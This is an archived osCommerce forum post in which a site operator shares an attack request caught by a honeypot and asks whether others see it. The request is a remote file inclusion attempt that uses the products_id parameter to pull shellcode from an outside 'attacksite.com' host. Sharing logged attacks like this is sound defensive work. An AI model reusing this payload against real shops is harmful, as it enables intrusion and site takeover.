Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Another XSS attack vector via products_id


Taipo

Recommended Posts

My honeypot site picked this up today:

 

http://www.victim-site.com/products_id=http://attacksite.com/tmp/shellcode.txt?&servidor=www.victim-site.com/product_print.php?products_id=&[email protected]

 

Anyone else seeing this in their logs?

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...